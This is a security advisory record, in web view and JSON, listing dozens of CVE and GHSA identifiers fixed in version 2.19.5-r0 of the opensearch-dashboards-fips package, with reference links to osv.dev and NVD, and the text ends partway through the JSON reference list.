Vulnerability from cleanstart

Published

2026-05-18 13:36

Modified

2026-05-10 11:41

Summary

Security fixes for CVE-2025-62718, CVE-2025-69873, CVE-2026-29045, CVE-2026-29085, CVE-2026-29086, CVE-2026-29087, CVE-2026-2950, CVE-2026-30827, CVE-2026-33750, CVE-2026-33891, CVE-2026-33894, CVE-2026-33895, CVE-2026-33896, CVE-2026-33916, CVE-2026-33937, CVE-2026-34043, CVE-2026-35213, CVE-2026-39406, CVE-2026-39407, CVE-2026-39408, CVE-2026-39409, CVE-2026-39410, CVE-2026-40175, CVE-2026-41238, CVE-2026-41239, CVE-2026-41240, CVE-2026-42033, CVE-2026-42034, CVE-2026-42035, CVE-2026-42036, CVE-2026-42037, CVE-2026-42038, CVE-2026-42039, CVE-2026-42040, CVE-2026-42041, CVE-2026-42042, CVE-2026-42043, CVE-2026-42044, CVE-2026-42264, CVE-2026-42338, CVE-2026-44455, CVE-2026-44456, CVE-2026-44457, CVE-2026-44458, CVE-2026-44459, CVE-2026-4800, CVE-2026-4923, CVE-2026-4926, CVE-2026-6321, CVE-2026-6322, ghsa-2328-f5f3-gj25, ghsa-26pp-8wgv-hjvm, ghsa-27v5-c462-wpq7, ghsa-2g4f-4pwh-qvx6, ghsa-2qvq-rjwj-gvw9, ghsa-2w6w-674q-4c4q, ghsa-39q2-94rc-95cp, ghsa-3mfm-83xf-c92r, ghsa-3p68-rc4w-qgx5, ghsa-3v7f-55p6-f55p, ghsa-3w6x-2g7m-8v23, ghsa-442j-39wm-28r2, ghsa-445q-vr5w-6q77, ghsa-458j-xx4x-4375, ghsa-46wh-pxpv-q5gq, ghsa-5c6j-r48x-rmvq, ghsa-5c9x-8gcm-mpgx, ghsa-5m6q-g25r-mvwx, ghsa-5pq2-9x2x-5p6w, ghsa-62hf-57xw-28j9, ghsa-69xw-7hcm-h432, ghsa-6chq-wfr3-2hj9, ghsa-7rx3-28cr-v5wh, ghsa-92pp-h63x-v22m, ghsa-9cx6-37pm-9jff, ghsa-9vqf-7f2p-gf9v, ghsa-c2c7-rcm5-vvqj, ghsa-crv5-9vww-q3g8, ghsa-f23m-r3pf-42rh, ghsa-f886-m6hf-6m8v, ghsa-fvcv-3m26-pcqx, ghsa-h7mw-gpvr-xq4m, ghsa-j3q9-mxjg-w52f, ghsa-jg4p-7fhp-p32p, ghsa-m7pr-hjqh-92cm, ghsa-p6xx-57qc-3wxr, ghsa-p77w-8qqv-26rm, ghsa-pf86-5x62-jrwf, ghsa-pmwg-cvhr-8vh7, ghsa-ppp5-5v6c-4jwp, ghsa-q3j6-qgpj-74h6, ghsa-q5qw-h33p-qvwr, ghsa-q67f-28xg-22rw, ghsa-q8qp-cvcw-x6jj, ghsa-qj8w-gfj5-8c6v, ghsa-qp7p-654g-cw7p, ghsa-r4q5-vmmm-2653, ghsa-r5fr-rjxr-66jc, ghsa-r5rp-j6wh-rvv4, ghsa-v2v4-37r5-5v8g, ghsa-v39h-62p7-jpjc, ghsa-v8w9-8mx6-g223, ghsa-v9jr-rg53-9pgp, ghsa-vf2m-468p-8v99, ghsa-w9j2-pvgh-6h63, ghsa-wc8c-qw6v-h7f6, ghsa-wmmm-f939-6g9c, ghsa-xf4j-xp2r-rqqx, ghsa-xhjh-pmcv-23jw, ghsa-xhpv-hc6g-r9c6, ghsa-xjpj-3mr7-gcpf, ghsa-xpcf-pg52-r92g, ghsa-xx6v-rp6x-q39c applied in versions: 2.19.5-r0

Details

Multiple security vulnerabilities affect the opensearch-dashboards-fips package. These issues are resolved in later releases. See references for individual vulnerability details.

References

URL

Type

	https://github.com/cleanstart-dev/cleanstart-secu…	ADVISORY
	https://osv.dev/vulnerability/CVE-2025-62718	WEB
	https://osv.dev/vulnerability/CVE-2025-69873	WEB
	https://osv.dev/vulnerability/CVE-2026-29045	WEB
	https://osv.dev/vulnerability/CVE-2026-29085	WEB
	https://osv.dev/vulnerability/CVE-2026-29086	WEB
	https://osv.dev/vulnerability/CVE-2026-29087	WEB
	https://osv.dev/vulnerability/CVE-2026-2950	WEB
	https://osv.dev/vulnerability/CVE-2026-30827	WEB
	https://osv.dev/vulnerability/CVE-2026-33750	WEB
	https://osv.dev/vulnerability/CVE-2026-33891	WEB
	https://osv.dev/vulnerability/CVE-2026-33894	WEB
	https://osv.dev/vulnerability/CVE-2026-33895	WEB
	https://osv.dev/vulnerability/CVE-2026-33896	WEB
	https://osv.dev/vulnerability/CVE-2026-33916	WEB
	https://osv.dev/vulnerability/CVE-2026-33937	WEB
	https://osv.dev/vulnerability/CVE-2026-34043	WEB
	https://osv.dev/vulnerability/CVE-2026-35213	WEB
	https://osv.dev/vulnerability/CVE-2026-39406	WEB
	https://osv.dev/vulnerability/CVE-2026-39407	WEB
	https://osv.dev/vulnerability/CVE-2026-39408	WEB
	https://osv.dev/vulnerability/CVE-2026-39409	WEB
	https://osv.dev/vulnerability/CVE-2026-39410	WEB
	https://osv.dev/vulnerability/CVE-2026-40175	WEB
	https://osv.dev/vulnerability/CVE-2026-41238	WEB
	https://osv.dev/vulnerability/CVE-2026-41239	WEB
	https://osv.dev/vulnerability/CVE-2026-41240	WEB
	https://osv.dev/vulnerability/CVE-2026-42033	WEB
	https://osv.dev/vulnerability/CVE-2026-42034	WEB
	https://osv.dev/vulnerability/CVE-2026-42035	WEB
	https://osv.dev/vulnerability/CVE-2026-42036	WEB
	https://osv.dev/vulnerability/CVE-2026-42037	WEB
	https://osv.dev/vulnerability/CVE-2026-42038	WEB
	https://osv.dev/vulnerability/CVE-2026-42039	WEB
	https://osv.dev/vulnerability/CVE-2026-42040	WEB
	https://osv.dev/vulnerability/CVE-2026-42041	WEB
	https://osv.dev/vulnerability/CVE-2026-42042	WEB
	https://osv.dev/vulnerability/CVE-2026-42043	WEB
	https://osv.dev/vulnerability/CVE-2026-42044	WEB
	https://osv.dev/vulnerability/CVE-2026-42264	WEB
	https://osv.dev/vulnerability/CVE-2026-42338	WEB
	https://osv.dev/vulnerability/CVE-2026-44455	WEB
	https://osv.dev/vulnerability/CVE-2026-44456	WEB
	https://osv.dev/vulnerability/CVE-2026-44457	WEB
	https://osv.dev/vulnerability/CVE-2026-44458	WEB
	https://osv.dev/vulnerability/CVE-2026-44459	WEB
	https://osv.dev/vulnerability/CVE-2026-4800	WEB
	https://osv.dev/vulnerability/CVE-2026-4923	WEB
	https://osv.dev/vulnerability/CVE-2026-4926	WEB
	https://osv.dev/vulnerability/CVE-2026-6321	WEB
	https://osv.dev/vulnerability/CVE-2026-6322	WEB
	https://osv.dev/vulnerability/ghsa-2328-f5f3-gj25	WEB
	https://osv.dev/vulnerability/ghsa-26pp-8wgv-hjvm	WEB
	https://osv.dev/vulnerability/ghsa-27v5-c462-wpq7	WEB
	https://osv.dev/vulnerability/ghsa-2g4f-4pwh-qvx6	WEB
	https://osv.dev/vulnerability/ghsa-2qvq-rjwj-gvw9	WEB
	https://osv.dev/vulnerability/ghsa-2w6w-674q-4c4q	WEB
	https://osv.dev/vulnerability/ghsa-39q2-94rc-95cp	WEB
	https://osv.dev/vulnerability/ghsa-3mfm-83xf-c92r	WEB
	https://osv.dev/vulnerability/ghsa-3p68-rc4w-qgx5	WEB
	https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p	WEB
	https://osv.dev/vulnerability/ghsa-3w6x-2g7m-8v23	WEB
	https://osv.dev/vulnerability/ghsa-442j-39wm-28r2	WEB
	https://osv.dev/vulnerability/ghsa-445q-vr5w-6q77	WEB
	https://osv.dev/vulnerability/ghsa-458j-xx4x-4375	WEB
	https://osv.dev/vulnerability/ghsa-46wh-pxpv-q5gq	WEB
	https://osv.dev/vulnerability/ghsa-5c6j-r48x-rmvq	WEB
	https://osv.dev/vulnerability/ghsa-5c9x-8gcm-mpgx	WEB
	https://osv.dev/vulnerability/ghsa-5m6q-g25r-mvwx	WEB
	https://osv.dev/vulnerability/ghsa-5pq2-9x2x-5p6w	WEB
	https://osv.dev/vulnerability/ghsa-62hf-57xw-28j9	WEB
	https://osv.dev/vulnerability/ghsa-69xw-7hcm-h432	WEB
	https://osv.dev/vulnerability/ghsa-6chq-wfr3-2hj9	WEB
	https://osv.dev/vulnerability/ghsa-7rx3-28cr-v5wh	WEB
	https://osv.dev/vulnerability/ghsa-92pp-h63x-v22m	WEB
	https://osv.dev/vulnerability/ghsa-9cx6-37pm-9jff	WEB
	https://osv.dev/vulnerability/ghsa-9vqf-7f2p-gf9v	WEB
	https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj	WEB
	https://osv.dev/vulnerability/ghsa-crv5-9vww-q3g8	WEB
	https://osv.dev/vulnerability/ghsa-f23m-r3pf-42rh	WEB
	https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v	WEB
	https://osv.dev/vulnerability/ghsa-fvcv-3m26-pcqx	WEB
	https://osv.dev/vulnerability/ghsa-h7mw-gpvr-xq4m	WEB
	https://osv.dev/vulnerability/ghsa-j3q9-mxjg-w52f	WEB
	https://osv.dev/vulnerability/ghsa-jg4p-7fhp-p32p	WEB
	https://osv.dev/vulnerability/ghsa-m7pr-hjqh-92cm	WEB
	https://osv.dev/vulnerability/ghsa-p6xx-57qc-3wxr	WEB
	https://osv.dev/vulnerability/ghsa-p77w-8qqv-26rm	WEB
	https://osv.dev/vulnerability/ghsa-pf86-5x62-jrwf	WEB
	https://osv.dev/vulnerability/ghsa-pmwg-cvhr-8vh7	WEB
	https://osv.dev/vulnerability/ghsa-ppp5-5v6c-4jwp	WEB
	https://osv.dev/vulnerability/ghsa-q3j6-qgpj-74h6	WEB
	https://osv.dev/vulnerability/ghsa-q5qw-h33p-qvwr	WEB
	https://osv.dev/vulnerability/ghsa-q67f-28xg-22rw	WEB
	https://osv.dev/vulnerability/ghsa-q8qp-cvcw-x6jj	WEB
	https://osv.dev/vulnerability/ghsa-qj8w-gfj5-8c6v	WEB
	https://osv.dev/vulnerability/ghsa-qp7p-654g-cw7p	WEB
	https://osv.dev/vulnerability/ghsa-r4q5-vmmm-2653	WEB
	https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc	WEB
	https://osv.dev/vulnerability/ghsa-r5rp-j6wh-rvv4	WEB
	https://osv.dev/vulnerability/ghsa-v2v4-37r5-5v8g	WEB
	https://osv.dev/vulnerability/ghsa-v39h-62p7-jpjc	WEB
	https://osv.dev/vulnerability/ghsa-v8w9-8mx6-g223	WEB
	https://osv.dev/vulnerability/ghsa-v9jr-rg53-9pgp	WEB
	https://osv.dev/vulnerability/ghsa-vf2m-468p-8v99	WEB
	https://osv.dev/vulnerability/ghsa-w9j2-pvgh-6h63	WEB
	https://osv.dev/vulnerability/ghsa-wc8c-qw6v-h7f6	WEB
	https://osv.dev/vulnerability/ghsa-wmmm-f939-6g9c	WEB
	https://osv.dev/vulnerability/ghsa-xf4j-xp2r-rqqx	WEB
	https://osv.dev/vulnerability/ghsa-xhjh-pmcv-23jw	WEB
	https://osv.dev/vulnerability/ghsa-xhpv-hc6g-r9c6	WEB
	https://osv.dev/vulnerability/ghsa-xjpj-3mr7-gcpf	WEB
	https://osv.dev/vulnerability/ghsa-xpcf-pg52-r92g	WEB
	https://osv.dev/vulnerability/ghsa-xx6v-rp6x-q39c	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-62718	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2025-69873	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-29045	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-29085	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-29086	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-29087	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-2950	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-30827	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33750	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33891	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33894	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33895	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33896	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33916	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-33937	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-34043	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-35213	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-39406	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-39407	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-39408	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-39409	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-39410	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-40175	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-41238	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-41239	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-41240	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42033	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42034	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42035	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42036	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42037	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42038	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42039	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42040	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42041	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42042	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42043	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42044	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42264	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-42338	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-44455	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-44456	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-44457	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-44458	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-44459	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-4800	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-4923	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-4926	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-6321	WEB
	https://nvd.nist.gov/vuln/detail/CVE-2026-6322	WEB

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "CleanStart",
        "name": "opensearch-dashboards-fips"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "2.19.5-r0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "credits": [],
  "database_specific": {},
  "details": "Multiple security vulnerabilities affect the opensearch-dashboards-fips package. These issues are resolved in later releases. See references for individual vulnerability details.",
  "id": "CLEANSTART-2026-BE61221",
  "modified": "2026-05-10T11:41:43Z",
  "published": "2026-05-18T13:36:50.922233Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/cleanstart-dev/cleanstart-security-advisories/tree/main/advisories/2026/CLEANSTART-2026-BE61221.json"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-62718"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2025-69873"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-29045"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-29085"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-29086"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-29087"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-2950"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-30827"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33750"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33891"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33894"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33895"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33896"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33916"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-33937"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-34043"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-35213"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-39406"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-39407"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-39408"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-39409"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-39410"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-40175"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-41238"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-41239"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-41240"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42033"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42034"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42035"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42036"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42037"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42038"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42039"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42040"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42041"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42042"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42043"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42044"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42264"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-42338"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-44455"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-44456"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-44457"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-44458"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-44459"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-4800"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-4923"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-4926"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-6321"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/CVE-2026-6322"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-2328-f5f3-gj25"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-26pp-8wgv-hjvm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-27v5-c462-wpq7"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-2g4f-4pwh-qvx6"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-2qvq-rjwj-gvw9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-2w6w-674q-4c4q"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-39q2-94rc-95cp"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-3mfm-83xf-c92r"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-3p68-rc4w-qgx5"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-3v7f-55p6-f55p"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-3w6x-2g7m-8v23"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-442j-39wm-28r2"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-445q-vr5w-6q77"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-458j-xx4x-4375"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-46wh-pxpv-q5gq"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-5c6j-r48x-rmvq"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-5c9x-8gcm-mpgx"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-5m6q-g25r-mvwx"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-5pq2-9x2x-5p6w"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-62hf-57xw-28j9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-69xw-7hcm-h432"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-6chq-wfr3-2hj9"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-7rx3-28cr-v5wh"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-92pp-h63x-v22m"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-9cx6-37pm-9jff"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-9vqf-7f2p-gf9v"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-c2c7-rcm5-vvqj"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-crv5-9vww-q3g8"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-f23m-r3pf-42rh"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-f886-m6hf-6m8v"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-fvcv-3m26-pcqx"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-h7mw-gpvr-xq4m"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-j3q9-mxjg-w52f"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-jg4p-7fhp-p32p"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-m7pr-hjqh-92cm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-p6xx-57qc-3wxr"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-p77w-8qqv-26rm"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-pf86-5x62-jrwf"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-pmwg-cvhr-8vh7"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-ppp5-5v6c-4jwp"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-q3j6-qgpj-74h6"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-q5qw-h33p-qvwr"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-q67f-28xg-22rw"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-q8qp-cvcw-x6jj"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-qj8w-gfj5-8c6v"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-qp7p-654g-cw7p"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-r4q5-vmmm-2653"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-r5fr-rjxr-66jc"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-r5rp-j6wh-rvv4"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-v2v4-37r5-5v8g"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-v39h-62p7-jpjc"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-v8w9-8mx6-g223"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-v9jr-rg53-9pgp"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-vf2m-468p-8v99"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-w9j2-pvgh-6h63"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-wc8c-qw6v-h7f6"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-wmmm-f939-6g9c"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xf4j-xp2r-rqqx"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xhjh-pmcv-23jw"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xhpv-hc6g-r9c6"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xjpj-3mr7-gcpf"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xpcf-pg52-r92g"
    },
    {
      "type": "WEB",
      "url": "https://osv.dev/vulnerability/ghsa-xx6v-rp6x-q39c"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-62718"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-69873"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29045"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29085"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29086"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29087"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2950"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30827"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33750"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33891"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33894"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33895"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33896"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33916"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33937"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34043"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35213"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39406"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39407"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39408"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39409"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39410"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40175"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41238"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41239"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41240"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42033"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42034"
    },
    {
      "type": "WEB",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42035"
    },
    {
      "type": "WEB",
